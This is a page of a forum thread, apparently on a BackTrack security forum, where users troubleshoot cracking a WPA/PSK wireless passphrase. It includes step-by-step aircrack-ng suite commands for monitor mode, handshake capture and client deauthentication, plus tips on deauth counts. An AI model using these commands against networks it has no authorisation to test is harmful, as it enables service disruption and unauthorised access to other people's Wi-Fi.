Page 3 of 3 FirstFirst 123
Results 21 to 26 of 26

Thread: Help with WPA/PSK

  1. #21
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    Quote Originally Posted by LMNOParis View Post
    again, what command are you using to run the crack? if you have the handshake, and you have the .cap file, you should be set to run the crack. what exactly do you put following aircrack-ng......?
    The name of the capture file, obviously.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  2. #22
    Just burned his ISO LMNOParis's Avatar
    Join Date
    Mar 2010
    Posts
    23

    Default

    Quote Originally Posted by theprez98 View Post
    The name of the capture file, obviously.
    yes. i was saying the file itself because if he already has a cap file i don't know why injection matters at that point.

  3. #23
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    19

    Default

    But without getting HANDSHAKE can i proceed to the next step?


    I. Change device to Monitor Mode:


    1) airmon-ng stop eth1


    2) airmon-ng start eth1

    (monitor mode enabled)


    3) airodump-ng eth1


    4) After you see your network and clients hit CTRL + C but leave window open


    5) Open New shell window


    6) airodump-ng -c 11 -w psk --bssid 00:1E:40:53:XX:XX eth1



    III. Deauth the wireless client


    7) aireplay-ng -0 1 -a 00:1E:40:53:XX:XX -c 00:13:F7:27:XX:XX eth1

    the whole problem starts here i have even tried the above command with 3 and 5 ATTEMPT but same result alwayz

    Sending DeAuth to station -- STMAC : [[BSSID_CLIENT]]

    but no handshake .As i have reinstalled the BT3 you know but on the old instaltion i was getting handshakes but no passphrase found problem was there even passphrase was there for now i am just messing with HANDSHAKE

  4. #24
    Just burned his ISO LMNOParis's Avatar
    Join Date
    Mar 2010
    Posts
    23

    Default

    ah boy. you do not need a handshake for any of that, as you are doing that to GET a handshake. as far as the deauth goes, try 10, or 15..... make sure the other attached wireless device is connected properly. other than that, i don't know why you aren't getting the handshake. i get it with 2 deauth attempts since everything is so close to me.

  5. #25
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Since your problem seems to be deAuthing the client have you attempted to simply capture the handshake without performing this step? As you surely are aware, deauthenticating the client is not a mandatory step and you can simply capture the handshake when the client manually connects to the WAP.

    I am not suggesting this as a solution, but rather as a workaround and possibly a step in the right direction. Could you also kindly provide the exact make/model of your wireless chipset as I can't see it mentioned in any of your earlier posts in this thread.
    -Monkeys are like nature's humans.

  6. #26
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    19

    Default

    Thanx for the effort mate i will try all possible things and report you back :-(

Page 3 of 3 FirstFirst 123

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •